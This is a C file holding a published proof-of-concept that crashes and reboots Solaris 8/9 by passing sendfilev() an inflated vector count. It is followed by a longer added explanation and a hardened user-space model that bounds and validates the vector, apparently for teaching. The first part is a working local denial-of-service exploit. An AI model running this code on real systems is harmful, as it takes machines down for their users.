/*
 * Solaris 8/9 sendfilev PoC exploit code.
 *
 * Causes a DoS and the system will reboot.
 *
 * I'm not sure this is just a DoS, because honestly
 * it smells somewhat like a buffer overflow. If
 * anyone figures out more, email me.
 *
 * Jon Hart
 *
 * $CC -o solaris-sendfilev-exploit solaris-sendfilev-exploit.c -lsendfile
 *
 * See:
 *
 * http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57470
 * http://securityfocus.com/bid/10202/
 *
 * I take no responsibility whatsoever for what you do
 * with this code. Use at your own risk.
 */

/* The header names were lost from this copy of the file; these are the
 * ones the code below needs on Solaris (sendfilev() and struct sendfilevec
 * are declared in <sys/sendfile.h>). */
#include <sys/types.h>
#include <sys/sendfile.h>
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    ssize_t ret;
    size_t xfer;
    struct sendfilevec vec[1];

    /* Scratch output file; sendfilev() writes the vector's data here. */
    int fd = open("/tmp/.sendfile", O_RDWR | O_CREAT | O_TRUNC, 0600);

    /* A single, well-formed vector entry. */
    vec[0].sfv_fd = open("/etc/hosts", O_RDONLY);
    vec[0].sfv_flag = 0;
    vec[0].sfv_off = 0;
    vec[0].sfv_len = 0;

    /* This is where the DoS happens. Point it way too far into the vector,
     * which only has 1 entry in it: the count passed as sfvcnt (100) is
     * what the kernel trusts, not the real size of vec[]. */
    ret = sendfilev(fd, vec, 100, &xfer);

    (void)ret;
    (void)argc;
    (void)argv;
    return 0;
}
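The only thing the PoC above actually demonstrates is that the kernel takes the caller-supplied `sfvcnt` at face value and walks past the end of a one-entry vector; the author says the root cause is unknown, and nothing below claims otherwise. What follows is an added, user-space model (not Sun's kernel code, and not part of the original file) of the defensive pattern a syscall entry point is expected to apply to a `(vector, count)` pair: cap the count, copy the entries in one at a time with a fallible copyin, and validate each entry before using it. `struct sfvec`, `SFV_MAX`, `struct uspace`, `copyin_sim()` and `sendfilev_walk()` are all assumed names for this illustration; `copyin_sim()` simulates a copyin that faults outside the caller's mapping so the example runs anywhere.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>

/* Stand-in for Solaris's struct sendfilevec, with the same field names so the
 * PoC's vector maps onto it. Assumed layout for this example, not Sun's header. */
struct sfvec {
    int          sfv_fd;
    unsigned int sfv_flag;
    off_t        sfv_off;
    size_t       sfv_len;
};

/* Hypothetical per-call cap on vector entries; what matters is that a cap
 * exists and is checked before any entry is touched, not this value. */
#define SFV_MAX 16

/* Simulated user address range: copyin_sim() fails with EFAULT for any byte
 * outside [base, base+len), the way a real copyin faults on an unmapped page. */
struct uspace {
    const unsigned char *base;
    size_t len;
};

static int copyin_sim(const struct uspace *u, uintptr_t uaddr, void *kdst, size_t n)
{
    uintptr_t lo = (uintptr_t)u->base;
    uintptr_t hi = lo + u->len;
    if (uaddr < lo || uaddr > hi || n > hi - uaddr)
        return EFAULT;
    memcpy(kdst, (const void *)uaddr, n);
    return 0;
}

/* Hardened vector walk. Bounds the caller-supplied count first, then copies in
 * and validates one entry at a time, so an overstated sfvcnt yields EINVAL
 * (cap exceeded) or EFAULT (ran off the caller's mapping) rather than a read
 * past the end of the vector. Returns 0 and the byte total on success, or a
 * positive errno value. */
int sendfilev_walk(const struct uspace *u, const struct sfvec *uvec, int sfvcnt, size_t *total)
{
    size_t sum = 0;
    if (sfvcnt <= 0 || sfvcnt > SFV_MAX)
        return EINVAL;
    for (int i = 0; i < sfvcnt; i++) {
        struct sfvec e;
        /* Address computed as an integer so no out-of-bounds pointer is formed. */
        uintptr_t ua = (uintptr_t)uvec + (uintptr_t)i * sizeof *uvec;
        int err = copyin_sim(u, ua, &e, sizeof e);
        if (err)
            return err;
        /* Simplification: real Solaris also accepts SFV_FD_SELF here. */
        if (e.sfv_fd < 0 || e.sfv_off < 0)
            return EBADF;
        if (e.sfv_len > SIZE_MAX - sum)   /* running total would wrap */
            return EINVAL;
        sum += e.sfv_len;
    }
    *total = sum;
    return 0;
}

/* Constructed input mirroring the PoC: a one-entry vector whose mapping ends
 * exactly at the end of the array. Walk it with whatever count the caller
 * claims (the PoC claims 100). */
int demo_overstated_count(int sfvcnt, size_t *total)
{
    static const struct sfvec vec[1] = { { 3, 0, 0, 4096 } };
    struct uspace u = { (const unsigned char *)vec, sizeof vec };
    return sendfilev_walk(&u, vec, sfvcnt, total);
}
```

With the true count of 1 the walk succeeds and totals 4096 bytes; with the PoC's count of 100 it is rejected at the cap before any entry is read; with a count of 2 the cap passes but the copyin of the second entry faults cleanly, which is the outcome a kernel wants instead of whatever the unpatched Solaris kernel does with the same input.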